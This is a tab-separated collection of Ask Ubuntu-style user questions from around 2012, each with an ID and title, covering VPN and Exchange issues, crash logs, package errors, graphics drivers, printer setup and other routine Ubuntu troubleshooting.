98010	openvpn / pptp vpn in combination with exchange 2010	i will start off by saying - my issue is very odd and i really have no idea where to start searching . alright the introduction : i have got : ms 2008 pptp vpn server openvpn on endian firewall server all are on the same network all hostnames resolve fine ( ping ) but the main cas array gives a ( dup ! ) behind every ping ( in ubuntu only ) . 64 bytes from 192.168.0.35 : icmp_req=1 ttl=127 time=292 ms 64 bytes from 192.168.0.35 : icmp_req=1 ttl=127 time=293 ms ( dup ! ) 64 bytes from 192.168.0.35 : icmp_req=2 ttl=127 time=294 ms 64 bytes from 192.168.0.35 : icmp_req=2 ttl=127 time=294 ms ( dup ! ) my client ( laptop ) is on the other end of the world in china these days . exchange : 2x cas using loadbalancing 2x mailbox database servers all have exchange 2010 sp1 ( i believe rollup 6 ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- vpn servers have been tested in combination with exchange on windows - no issues . on ubuntu however.. it seems to behave odd . if i go to the owa url -- > it loads up fine both with vpn on and off . however there 's one major difference : with vpn on if i do anything inside owa ( like checking a email - marked for `` read '' ) or simply send a message.. save a message etc -- > it does not push through the changes ( it stays on `` saving '' ) with vpn off owa seems to respond faster , and every function works as it should . now of course this is not the original issue but this is on top of the rest of the problem . my original problem was exchange mapi - it works but takes ages to load ( and seems to do nothing only very few times it pulls in messages- the rest of the time it stays loading ) . unfortunatly i can not test exchange mapi external ( without vpn ) as it uses port 135 - which by most providers : are blocked . i have no idea where to start.. i 'm pretty sure it 's located in the vpn settings . for pptp : point to point encryption ( mppe ) ( 128 bit ) allow stateful encryption send ppp echo packets -- -- -- -- -- -- -- -- -- -- -- -- -- -- point to point encryption is not optional unfortunaly ms pptp will not connect to ubuntu without it . for openvpn : connection method is password . use a tap device is turned on ( for some reason it will not connect without it . ) any information , or help on where to check for errors will be very helpful .
98013	battery being guzzled , and drained faster than windows os , by alot	11.10 , has it been tested with sandy bridge processors ? i 'm asking this , mainly have no idea why my computer under ubuntu lasts only 2 hours ( screen closed ) but when under windows 7 home , it lasts approx 4 hours ( screen on , led screen ) . ( and my lap is hot running ubuntu . ) computer is a samsung-laptop model : np700z5b-w01ub , second gen i7 , graphics ati mobility radeon gddr5 512mb , 6 gb ddr3 mem . i 'm not sure what is , but ubuntu 11.10 is a bit ( alot ) buggy . and i 'm more so curious why this is ... if my motehrboard architecture , processor architecture . or am i using the wrong ubuntu version . i downloaded ubuntu 11.10 , not sure which build ... i ca n't even find that with this new setup . battery guzzler . gedit does n't launch from terminal , install packages are n't launching correctly . mouse-tocuhpad is uber sensitive ( but i think that 's a driver issue ) and i could not launch a feedback report . considering downgrading or `` installing '' 11.04 or curious when is the next big release for ubuntu . thank you and have a nice day : )
98016	alternative printer driver for fuji xerox docuprint p205b ?	is there a driver for a similar printer that also happens to work for the fuji xerox p205 b ? i have tried the generic pcl 5 driver and the generic postscript driver but they do not work . any other suggestions ? i 'm on 10.10 ( maverick ) . update the fuji xerox website has a linux driver download as an .iso image . when you open the image you will see 3 drivers . one for hp ux for the pa-risc and another for solaris sparc and one for redhat x86 , x86-64 , etc . i picked the redhat for my computer . it invokes rpm so install that first . the installation script crashes .
98017	ubuntu 11.10 crashing ( maybe `` gnome-session : fatal io error 11 ( resource temporarily unavailable ) on x server '' )	my ubuntu 11.10 crashed the 2nd time in few hours recently , i looked at the syslog and pasted it below . i think the cause might be the either of the following lines ? gnome-session : fatal io error 11 ( resource temporarily unavailable ) on x server apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/bin/evince '' name= '' /run/udev/data/b8:4 '' pid=9150 comm= '' evince '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=0 jan 24 14:39:01 jm cron [ 9151 ] : ( cron ) info ( no mta installed , discarding output ) jan 24 14:39:03 jm kernel : [ 4375.718487 ] type=1400 audit ( 1327387143.521:53 ) : apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/bin/evince '' name= '' /run/udev/data/b8:4 '' pid=9158 comm= '' evince '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=0 jan 24 14:39:03 jm kernel : [ 4376.102319 ] type=1400 audit ( 1327387143.905:54 ) : apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/bin/evince '' name= '' /run/udev/data/b8:4 '' pid=9158 comm= '' evince '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=0 jan 24 14:39:05 jm kernel : [ 4377.980823 ] type=1400 audit ( 1327387145.785:55 ) : apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/bin/evince '' name= '' /run/udev/data/b8:4 '' pid=9158 comm= '' evince '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=0 jan 24 14:40:50 jm kernel : [ 4483.073773 ] type=1400 audit ( 1327387250.945:56 ) : apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/bin/evince '' name= '' /run/udev/data/b8:4 '' pid=9168 comm= '' evince '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=0 jan 24 14:41:50 jm kernel : [ 4542.828368 ] type=1400 audit ( 1327387310.741:57 ) : apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/bin/evince '' name= '' /run/udev/data/b8:4 '' pid=9170 comm= '' evince '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=0 jan 24 14:45:53 jm kernel : [ 4785.805094 ] type=1400 audit ( 1327387553.873:58 ) : apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/bin/evince '' name= '' /run/udev/data/b8:4 '' pid=9332 comm= '' evince '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=0 jan 24 14:45:53 jm kernel : [ 4785.842048 ] type=1400 audit ( 1327387553.909:59 ) : apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/bin/evince '' name= '' /run/udev/data/b8:4 '' pid=9335 comm= '' evince '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=0 jan 24 14:45:53 jm kernel : [ 4785.881980 ] type=1400 audit ( 1327387553.949:60 ) : apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/bin/evince '' name= '' /run/udev/data/b8:4 '' pid=9335 comm= '' evince '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=0 jan 24 14:45:53 jm kernel : [ 4785.889949 ] type=1400 audit ( 1327387553.957:61 ) : apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/bin/evince '' name= '' /run/udev/data/b8:4 '' pid=9335 comm= '' evince '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=0 jan 24 14:45:53 jm kernel : [ 4785.918806 ] type=1400 audit ( 1327387553.985:62 ) : apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/bin/evince '' name= '' /run/udev/data/b8:4 '' pid=9338 comm= '' evince '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=0 jan 24 14:45:53 jm kernel : [ 4785.918896 ] type=1400 audit ( 1327387553.985:63 ) : apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/bin/evince '' name= '' /run/udev/data/b8:4 '' pid=9335 comm= '' evince '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=0 jan 24 14:45:53 jm kernel : [ 4785.919014 ] type=1400 audit ( 1327387553.985:64 ) : apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/bin/evince '' name= '' /run/udev/data/b8:4 '' pid=9340 comm= '' evince '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=0 jan 24 14:45:53 jm kernel : [ 4785.920491 ] type=1400 audit ( 1327387553.989:65 ) : apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/bin/evince '' name= '' /run/udev/data/b8:4 '' pid=9339 comm= '' evince '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=0 jan 24 14:45:53 jm kernel : [ 4785.925745 ] type=1400 audit ( 1327387553.993:66 ) : apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/bin/evince '' name= '' /run/udev/data/b8:4 '' pid=9335 comm= '' evince '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=0 jan 24 14:45:58 jm kernel : [ 4790.399063 ] type=1400 audit ( 1327387558.469:67 ) : apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/bin/evince '' name= '' /run/udev/data/b8:4 '' pid=9338 comm= '' evince '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=0 jan 24 14:46:00 jm kernel : [ 4791.931711 ] audit_printk_skb : 24 callbacks suppressed jan 24 14:46:00 jm kernel : [ 4791.931716 ] type=1400 audit ( 1327387560.001:76 ) : apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/bin/evince '' name= '' /run/udev/data/b8:4 '' pid=9338 comm= '' evince '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=0 jan 24 14:46:00 jm kernel : [ 4791.931928 ] type=1400 audit ( 1327387560.001:77 ) : apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/bin/evince '' name= '' /run/udev/data/b8:4 '' pid=9351 comm= '' evince '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=0 jan 24 14:46:00 jm kernel : [ 4792.299099 ] type=1400 audit ( 1327387560.369:78 ) : apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/bin/evince '' name= '' /run/udev/data/b8:4 '' pid=9338 comm= '' evince '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=0 jan 24 14:46:00 jm kernel : [ 4792.531328 ] type=1400 audit ( 1327387560.601:79 ) : apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/bin/evince '' name= '' /run/udev/data/b8:4 '' pid=9338 comm= '' evince '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=0 jan 24 14:46:10 jm kernel : [ 4802.221498 ] type=1400 audit ( 1327387570.297:80 ) : apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/bin/evince '' name= '' /run/udev/data/b8:4 '' pid=9351 comm= '' evince '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=0 jan 24 14:46:16 jm kernel : [ 4808.232986 ] type=1400 audit ( 1327387576.313:81 ) : apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/bin/evince '' name= '' /run/udev/data/b8:4 '' pid=9351 comm= '' evince '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=0 jan 24 14:46:22 jm kernel : [ 4814.277205 ] type=1400 audit ( 1327387582.361:82 ) : apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/bin/evince '' name= '' /run/udev/data/b8:4 '' pid=9351 comm= '' evince '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=0 jan 24 14:46:25 jm kernel : [ 4817.523485 ] type=1400 audit ( 1327387585.609:83 ) : apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/bin/evince '' name= '' /run/udev/data/b8:4 '' pid=9351 comm= '' evince '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=0 jan 24 14:46:29 jm kernel : [ 4821.784386 ] type=1400 audit ( 1327387589.873:84 ) : apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/bin/evince '' name= '' /run/udev/data/b8:4 '' pid=9351 comm= '' evince '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=0 jan 24 14:53:52 jm gnome-session [ 1326 ] : gdk-warning : gnome-session : fatal io error 11 ( resource temporarily unavailable ) on x server :0. # 012 jan 24 06:54:01 jm rtkit-daemon [ 1479 ] : successfully made thread 9629 of process 9629 ( n/a ) owned by '1000 ' high priority at nice level -11 . jan 24 06:54:01 jm rtkit-daemon [ 1479 ] : supervising 1 threads of 1 processes of 1 users . jan 24 14:54:01 jm pulseaudio [ 9629 ] : [ pulseaudio ] pid.c : stale pid file , overwriting . jan 24 06:54:01 jm rtkit-daemon [ 1479 ] : successfully made thread 9631 of process 9629 ( n/a ) owned by '1000 ' rt at priority 5 . jan 24 06:54:01 jm rtkit-daemon [ 1479 ] : supervising 2 threads of 1 processes of 1 users . jan 24 06:54:01 jm rtkit-daemon [ 1479 ] : successfully made thread 9664 of process 9629 ( n/a ) owned by '1000 ' rt at priority 5 . jan 24 06:54:01 jm rtkit-daemon [ 1479 ] : supervising 3 threads of 1 processes of 1 users . jan 24 06:54:01 jm rtkit-daemon [ 1479 ] : successfully made thread 9665 of process 9629 ( n/a ) owned by '1000 ' rt at priority 5 . jan 24 06:54:01 jm rtkit-daemon [ 1479 ] : supervising 4 threads of 1 processes of 1 users .
98022	startup/shutting down screen showing xubuntu 's bootsplash and not ubuntu 's	i installed xubuntu-desktop over ubuntu 11.10 and now when i shutdown my system or start it up , i see xubuntu 's bootsplash screen . is simply removing the plymouth theme for xubuntu corrects the problem and brings back default ubuntu 's ? i do n't want to 'experiment ' thereby breaking something during the process .
98029	does the megaupload shutdown put ubuntu one at risk ?	file sharing website megaupload has recently been shut down because they were hosting copyrighted files and therefore participating in copyright infringement . this has caused other file sharing websites to shut down over similar fears . i can definitely see the possibility of copyrighted files being shared on ubuntu one . does ubuntu one have to fear the possibility of being shutdown at some time in the future ? megaupload shut down by the feds , founder arrested http : //torrentfreak.com/megaupload-shut-down-120119/ cyberlocker ecosystem shocked as big players take drastic action http : //torrentfreak.com/cyberlocker-ecosystem-shocked-as-big-players-take-drastic-action-120123/
98034	no 3d after ubuntu 11.10 updates - t420s intel sandy bridge	at rebooting my lenovo thinkpad t420s after the recent updates coming last friday ( not sure ) , i got severe graphical problems : could almost not use unity . i switched from intel to nvidia and loaded the restricted driver . then i saw some more updates coming and applied them . when i switched back to intel graphics ( integrated ) , i got only unity 2d . so no 3d any more on intel . any hints other than waiting for another update that fixes the issues ?
98035	streaming a webcam video to the web-page in ubuntu	i need a software which were able to capture images from a webcam and stream it to the web-page . i already tried a webcam-server , but it uses java applet on the client side for retrieving pictures , which is not supported on my client device ( android tablet ) . an alternative maybe be a software which captures images from a webcam and writes them to the same file , constantly rewriting it . in that case , my java-script on the client side can just use this file to constantly refresh an image . any ideas and suggestions are greatly appreciated .
98036	how to set encoding in gedit 3.2 ?	i can not display file coded with gbk . in gconf-editor of gnome 3.2 , i can not find encoding item of gedit . how to set it ? thanks
98040	why is permitrootlogin in sshd_config set to yes by default ?	as ubuntu has no real root account , why is /etc/ssh/sshd_config allowing remote root login anyway ? is n't that inconsistent ?
98044	package operation failed due to incorrect version of python	i tried to remove/add several python packages and always got the error message `` package operation failed '' ( using the ubuntu software center ) . when i tried to remove e.g . python-scipy using the terminal , i got the following : > pcfun27 @ pcfun27 : ~ $ sudo apt-get remove python-scipy > reading package lists ... done > building dependency tree > reading state information ... done > the following packages will be removed : > python-scipy > 0 upgraded , 0 newly installed , 1 to remove and 9 not upgraded . > 5 not fully installed or removed . > after this operation , 22.6mb disk space will be freed . > do you want to continue [ y/n ] ? y > ( reading database ... 243686 files and directories currently installed . ) > removing python-scipy ... > traceback ( most recent call last ) : > file `` /usr/bin/pycentral '' , line 2300 , in < module > > main ( ) > file `` /usr/bin/pycentral '' , line 2294 , in main > rv = action.run ( global_options ) > file `` /usr/bin/pycentral '' , line 1653 , in run > runtimes = get_installed_runtimes ( with_unsupported=true ) > file `` /usr/bin/pycentral '' , line 278 , in get_installed_runtimes > default_version = pyversions.default_version ( version_only=true ) > file `` /usr/share/pycentral-data/pyversions.py '' , line 172 , in default_version > raise valueerror , `` /usr/bin/python does not match the python default version . it > must be reset to point to % s '' % debian_default > valueerror : /usr/bin/python does not match the python default version . it must be reset > to point to python2.5 > dpkg : error processing python-scipy ( -- remove ) : > subprocess installed pre-removal script returned error exit status 1 > traceback ( most recent call last ) : > file `` /usr/bin/pycentral '' , line 2300 , in < module > > main ( ) > file `` /usr/bin/pycentral '' , line 2294 , in main > rv = action.run ( global_options ) > file `` /usr/bin/pycentral '' , line 1477 , in run > runtimes = get_installed_runtimes ( ) > file `` /usr/bin/pycentral '' , line 278 , in get_installed_runtimes > default_version = pyversions.default_version ( version_only=true ) > file `` /usr/share/pycentral-data/pyversions.py '' , line 172 , in default_version > raise valueerror , `` /usr/bin/python does not match the python default version . it > must be reset to point to % s '' % debian_default > valueerror : /usr/bin/python does not match the python default version . it must be reset > to point to python2.5 > dpkg : error while cleaning up : > subprocess installed post-installation script returned error exit status 1 > errors were encountered while processing : > python-scipy > e : sub-process /usr/bin/dpkg returned an error code ( 1 ) > pcfun27 @ pcfun27 : ~ $ i already found similar problems in some mailing lists and forums , but no solution did really help ( at all ) . i also think that this is a quite bigger problem , since i the `` package operation failed '' error trying to install/remove any package ( even though they do get removed/installed ) . i would really appreciate if someone had a hint for me , because i really need to install/remove certain packages to go on working on my thesis . os is ubuntu 10.04 running on a 64-bit machine . please tell me if you need further information .
98047	starting and stopping server with a desktop shortcut	i use sudo /opt/lampp/lampp start and sudo /opt/lampp/lampp stop every time in order to start and stop the lampp server installed in my computer . is there some way by which i can create an icon on my desktop , so that the above command get executed in terminal simply by clicking on the icon ? thanks in advance
98048	lxc container troubleshooting	i 'm trying to start my container node01 . it was working before and i just ca n't understand why all my containers ( 3 ) stopped working in one time after reboot . actually they not starting . after lxc-start -n node01 it just hangs and console do n't show startup process . pressing the keys just reflect symbols but nothing happening . i have ubuntu 11.10 oneiric 3.0.0-14-server x86_64 lxc-start in /var/log/syslog next lines shows after jan 24 11:19:14 us1 kernel : [ 11733.905542 ] device veth1xlpzk entered promiscuous mode jan 24 11:19:14 us1 kernel : [ 11733.905970 ] addrconf ( netdev_up ) : veth1xlpzk : link is not ready jan 24 11:19:14 us1 kernel : [ 11734.053982 ] addrconf ( netdev_change ) : veth1xlpzk : link becomes ready jan 24 11:19:14 us1 kernel : [ 11734.054016 ] br0 : port 2 ( veth1xlpzk ) entering forwarding state jan 24 11:19:14 us1 kernel : [ 11734.054019 ] br0 : port 2 ( veth1xlpzk ) entering forwarding state ping to container is working , but i ca n't ssh to it . only after lxc-stop -n node01 from another terminal my first terminal stops hangs . in /var/log/syslog shows next lines : jan 24 11:19:25 us1 kernel : [ 11744.448111 ] eth0 : no ipv6 routers present jan 24 11:19:25 us1 kernel : [ 11744.496065 ] veth1xlpzk : no ipv6 routers present jan 24 11:20:15 us1 kernel : [ 11794.424915 ] br0 : port 2 ( veth1xlpzk ) entering forwarding state jan 24 11:20:15 us1 kernel : [ 11794.426315 ] br0 : port 2 ( veth1xlpzk ) entering disabled state how to force it working ?
98053	why did mounting /media/mmmcsd work ?	i am novice ubuntu user . i 've struggled mounting my sd card on my ubuntu 11.04 . however , i 've googled the issue and now i 'm able to mount the card . but , i do n't know what difference the command made that enabled the sd card to mount and usable ? please help ! ! here is the command i 've used to change the settings . sudo mkdir /media/mmcsd sudo nano /etc/fstab then deleted the line starting with /dev/sdb1 then replaced it with the command below /dev/hdb1 /media/mmcsd vfat auto , user , sync , exec , uid=1000 , gid=1000 , umask=007 0 0 this did the magic . please explain .
98057	ubuntu and radeon hd6870	i have fresh installed the last ubuntu version 11.10 in my desktop computer but i have a problem with my graphic card radeon hd6870 at the boot of the o.s . hard disk interno western digital caviar green 500gb 3.5 '' intellipower 32mb case midi cooler master centurion 5 ii atx nero vga club 3d radeon hd 6870 core 900mhz memory gddr5 4200mhz 1gb 2xdvi hdmi 2xminidisplayport masterizzatore interno blu-ray lg bh10ls30 10x br/dvd/cd sata bulk nero cpu intel core i5-2500k 3.30ghz socket 1155 95w con gpu sandy bridge boxed alimentatore pc corsair enthusiast series tx650 v2 650w 80plus bronze scheda madre asrock h67de3 socket 1155 intel h67 ddr3 sata3 usb3 hdmi atx ram ddr3 geil value plus gvp36gb1333c7tc 1333mhz 6gb ( 3x2gb ) cl7-7-7-24 adapter displayport a hdmi , dvi e displayport this is my ubuntu version : distributor id : ubuntu description : ubuntu 11.10 release : 11.10 codename : oneiric the problem is after the boot . i can login but i can not split the screens in three parts . my desktop without the ati drivers and ubuntu drivers : when i try to set the monitors i get this error : [ 3130.906415 ] amdcccle [ 2548 ] : segfault at 8 ip 081cf6b8 sp bfcdbb00 error 4 in amdcccle [ 8048000+5d4000 ] ati catalyst configuration : xorg.conf configuration : section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' option `` accelmethod '' `` exa '' option `` migrationheuristic '' `` greedy '' option `` acceldfs '' `` true '' option `` enablepageflip '' `` true '' option `` enabledepthmoves '' `` true '' option `` colortiling '' `` on '' option `` exapixmaps '' `` on '' option `` renderaccel '' `` on '' endsection section `` screen '' identifier `` default screen '' defaultdepth 24 endsection section `` module '' load `` glx '' endsection i have solved using these commands : sudo apt-get remove -- purge xorg-driver-fglrx fglrx* sudo apt-get remove -- purge fglrx* sudo apt-get install -- reinstall libgl1-mesa-glx libgl1-mesa-dri sudo dpkg-reconfigure xserver-xorg sudo apt-get install build-essential cdbs fakeroot dh-make debhelper debconf libstdc++6 dkms libqtgui4 wget execstack libelfg0 dh-modaliases sudo mv /etc/x11/xorg.conf /etc/x11/xorg.conf.old then i have restarted the pc and the screens are set correct ! i have forgot that when i have started the ubuntu live from usb i have set the screens before to install the o.s . on my pc !
98059	is it possible to queue file transfers in nautilus like in krusader ?	i have heard that krusader has a great `` commander '' feature that allows you to start a file transfer and queue additional files to be transferred . they are transferred one by one in order , rather than kinda randomly all at once . is it possible to do this in nautilus ( or with an existing nautilus extension ) , or is nautilus not intended for this kind of thing ?
98060	where do lucid-updates come from ?	considering the following command : # apt-get -- simulate -- show-upgraded upgrade reading package lists ... done building dependency tree reading state information ... done the following packages will be upgraded : libimobiledevice0 libpam-ck-connector libparted0debian1 inst libimobiledevice0 [ 0.9.7-1ubuntu1 ] ( 0.9.7-1ubuntu1.2 ubuntu:10.04/lucid-updates ) inst libpam-ck-connector [ 0.4.1-3ubuntu1 ] ( 0.4.1-3ubuntu2 ubuntu:10.04/lucid-updates ) inst libparted0debian1 [ 2.2-5ubuntu5.1 ] ( 2.2-5ubuntu5.2 ubuntu:10.04/lucid-updates ) [ ... ] i can read an inst line as the following : inst < package > [ < oldversion > ] ( < newversion > ubuntu:10.04/lucid-updates ) can someone tell me where the ubuntu:10.04/lucid-updates comes from ? - considering an own repository , how is this configurable ?
98066	are there guidelines for requesting enhancements of open source projects ?	occasionally i think of enhancements for open source software applications i use . generally i track down wherever it is the project is hosted and log an request . i do not intend to contribute any code , i just want to make a suggestion . some projects have guidelines for such requests ( not allowing them , allowing them but frowning on `` me toos '' , etc ) , but others do n't . are there any broadly applicable guidelines or widely referred to articles on how to do this appropriately ? ( and any notes on making a request from an ubuntu context ? )
98079	linux and c : what does it mean this condition , and how to install the required packages in order to return true	using linux ubuntu with metasploit framework , i have a shell script which contains the following lines in the first begining of the file . at first glance i thought that i should install the the mingw32 package , so i uses the following line in terminal apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils but when i compile the below script , it still says that i must install mingw-w64n binutilis-mingw ... ... etc # lets check for mingw32 if builtin type -p i686-w64-mingw32-gcc > /dev/null ; then echo `` here is a network device list available on yor machine '' else echo `` please install the mingw-w64 , binutils-mingw-w64 , gcc-mingw-w64 , mingw- w64-dev , mingw-w64-tools '' echo `` exiting ... .. '' ; exit could some one help me what to write in the terminal in order to get the required packages installed with my linux ubuntu
98084	creating bootable ubuntu usb from mac	i downloaded the iso file of ubuntu 11.04 ( 32 bit ) from ubuntu download page and followed the instruction of creating bootable usb memory card . from the same download page ( http : //www.ubuntu.com/download/ubuntu/download ) . but after 9th step i.e . executing the following command sudo dd if=/path/to/downloaded.img of=/dev/rdiskn bs=1m mac could not detect the usb memory card . i have to format the memory card again . here is a configuration i am trying 1 . mac osx 10.6.8 2 . ubuntu 11.04 32 bit iso installation ( i created dmg file as per steps )
98087	can no longer open a password protected libreoffice .ods	well , this is fun . i have a couple of .ods files , password protected . after installing last ubuntu updates , including libreoffice 3.4.5 , i can no longer open those files . i 'm using 11.10 x64 oneiric . fortunately , my old ubuntu with the 10.04lts and openoffice 3.2 can open those files . i tried a workaround . i removed the password from the .ods files using openoffice , moved the files on oneiric and tried to save them with a password . the error i get is interesting : general input/output error . does someone has the same problem after the last libreoffice/ubuntu update ? before i was perfectly able to open those files .
98088	why does n't my graphics card clean the cache buffer at start-up ?	i have noticed a strange phenomenon when i try to reboot my ubuntu pc . i have a multi monitor configuration with a radeon hd6870 graphic card and when i reboot my pc i can see at the start-up of the os the images of the application previously used ! they are only pics like a wallpaper but few instants after these images disappear . why does this happens ? updating : when the monitor turns on again i can see it to flicker with three horizontal bars . i have to turn the monitor off and back on in order to update the sync with the graphic card .
98091	where can i find a list of panel indicators for 11.10 ?	i think unity is great and i 'd like to add some more indicators to my top panel . i have a large screen , so i have plenty of space for more than the handful i have ( weather , cpu usage , and the default ones ) . where can i find a list of panel indicators for 11.10 ? ( does such a centralised list exist ? )
98093	when using dual monitors , left monitor uses 1024x768 and right monitor uses 1920x720 . why its slow ?	i have one pc where i have my main screen using 1024x768 resolution and my another screen using 1980x720 resolution . but why its so slow , is there any way to make it faster like normal ? i had the same issue with fedora 15 like now i have with ubuntu . follow up : $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) $ export display=:0.0 & & glxinfo | grep -i direct direct rendering : yes
98094	can i install kdirstat on ubuntu 11.10 ?	other disk analyzers are far inferior as they do n't allow you to delete files from their interface . the to-ing and fro-ing back and forth between nautilus and disk usage analyzer is slow , tedious and silly , especially as there is a linux program that actually does the job properly . i can not find kdirstat in ubuntu software center .
98104	mp3 cover files are not retrieved from files	ubuntu 11.10 up to date . banshee is used to organize and listen to my music library . all music files are mp3 files and are accessed using smb from my nas . cd covers are `` included '' in mp3 files ( via current version of tag & rename tool ) . the cd covers displayed in banshee are not those included in mp3 files nor those present in directories . they are searched elsewhere from some web server . this feature is fine with windows 7 ( wmp and vlc ) and with some other upnp players .
98106	what 's new in unity 2d 5.2 ?	i 've really enjoyed using unity 2d 4.12 in 11.10 . it 's very fast , and it works better with some games than unity ( because of compiz ) . in precise pangolin , i notice that the new version is 5.2 . can someone provide information about user-visible changes between the two versions ? ( i did n't notice until afterwards that the version was released only half an hour before i asked . that 's completely accidental : ) )
98110	how to select folders to sync in ubuntuone ?	can i selectivly select what folders i want to sync in ubuntu one ? if so how ? currently i created a symlink from ubuntu one folder to the folder i want to share ? that will not waste space right ( duplicate data ) , but i suppose ubuntu one is supposed to be better integrated with dropbox and i should not need to do this ?
98112	how do i set fbreader as the default mobi ebook reader ?	is there a quick simple way of installing fbreader ? also , how do i fix the filetype not being recognized ( mime types ? ) i want to set fb reader as the default open for mobi ebooks , but it 's not recognized
98113	why does my desktop background keep changing ?	i am running ubuntu 10.04 . i installed xubuntu but i 'm using the gnome desktop . recently my desktop started changing , downloading random pictures from somewhere . i do n't remember installing an application to do this , but i must have . unfortunately i do n't remember what its name is . does this behavior ring any bells ? alternatively , what can i do to identify which application is doing this ? ( there is n't anything unusual in my startup applications . )
98116	how do i use cdemu with unity ?	there is this great application that can mount various cd images and thus emulate a cd drive . however , it is based on tray so it does not play nice with unity . how can it be run in unity ?
98119	install a list of packages only if they are n't already installed	i 'm trying to automate my setup as much as possible . to do this i have lists of packages that i want to install , for example : banshee wireshark audacity thunderbird thunderbird-lightning calibre deluge unison-gtk usb-creator-kde ding digikam chromium-browser bleachbit soundconverter kdenlive firefox-kde-support vlc kwrite openjdk-6-jre icedtea6-plugin virtualbox virtualbox-guest-additions-iso . i want to write a small bash script to call apt-get to install these packages only if they 're not already installed . currently i have this but it does n't work : dpkg -s `` $ 1 '' > /dev/null 2 > & 1 || apt-get -y install `` $ 1 '' , ( where $ 1 is the list )
98123	how can i force one single refresh rate across both my monitors	i have to different but similar monitors . according to nvidia-settings my main monitor is running at 59.93 hz while the other runs at 59.88 hz . in x video settings i have enabled vsync and that it should sync to my primary monitor . this results in video tearing on my secondary . is there a way to specify a refresh rate at which both monitors should run ?
98124	brother mfc-295cn printing improperly after enabling google cloud print	ok , so here is the thing . i have a brother mfc-295cn that is always connected to my desktop ( ubuntu 11.10 32 bit ) and was printing and scanning perfectly fine until , i decided to try out google cloud print from my android . ever since then , things do not print as they have been assigned to . it is printing tiny , and landscape always . i have since disabled cloud print on chromium , signed out of all gmail services , even re-installed the drivers from brother . but still it is printing improperly . i have an acer netbook ( ubuntu 11.10 32 bit ) that i have the mfc-295cn installed on and when i print from that ( connected via the usb ) it prints perfectly fine . how can i get my desktop to print normally again ? thank you for your time and answers . ** just remembered as well , when in libreoffice i printed to file rather then printer , it still printed that document improperly . it did not print to what i specified .
98128	rotated backups with snapshot on ubuntu with email notifications	is there a package for backing up folders in ubuntu with email notifications . i have looked at rsnapshot but it does not have email notifications .
98132	what is the unity hud and how can i install it on my system ?	i have read about the unity hud . is that a mock up or a real thing ? can i install it on my current ubuntu 11.10 installation or do i need to upgrade to 12.04 ?
98135	gnome-terminal ignores gtk theme	i run oneiric with fluxbox as the window manager , and gnome-terminal appears to disregard gtk theme . the theme support does work in other gtk applications ( for example , in gthumb and in firefox ) , but changing the theme makes no difference for gnome-terminal . i have oneiric , and i use lxappearance to change the theme . am i wrong in assuming that gnome-terminal is a gtk application ? or is the problem elsewhere ? note that the checkbox `` use colours from system theme '' in gnome-terminal configuration does not solve the problem , nor it is supposed to , since i am interested in the look and size of the menu , and the tabs , not their colour. ] lxappearance version is 0.5.1 , and so it appears that it is gtk3 compatible . it even creates the file gtk-3.0/settings.ini in the home directory which contains the selected settings . this , i think , rules out http : //bugs.debian.org/cgi-bin/bugreport.cgi ? bug=631897 as a possible cause .
